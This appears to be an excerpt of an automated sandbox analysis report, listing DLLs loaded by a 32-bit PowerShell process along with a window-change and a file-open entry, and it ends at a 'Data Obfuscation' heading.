    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

